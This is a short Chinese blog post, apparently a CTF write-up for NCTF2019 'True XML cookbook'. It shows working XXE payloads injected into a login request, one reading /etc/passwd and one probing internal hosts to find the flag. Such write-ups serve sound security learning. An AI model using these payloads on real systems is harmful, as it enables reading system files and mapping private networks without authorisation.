[NCTF2019]True XML cookbook

知识点

XXE探测内网

一如既往的登录框

抓包，添加外部注入实体，读取/etc/passwd

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>

<user><username>&admin;</username><password>123546</password></user>

读取历史操作命令.bash_history失败

读取/etc/hosts文件

看到内网有存活的主机，尝试访问

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "http://173.241.204.10">
  ]>

<user><username>&admin;</username><password>123546</password></user>

在173.241.204.11主机处发现flag

posted @ 2020-05-27 22:08 山野村夫z1 阅读(1476) 评论(0) 收藏举报

刷新页面返回顶部

山野村夫的博客

[NCTF2019]True XML cookbook

公告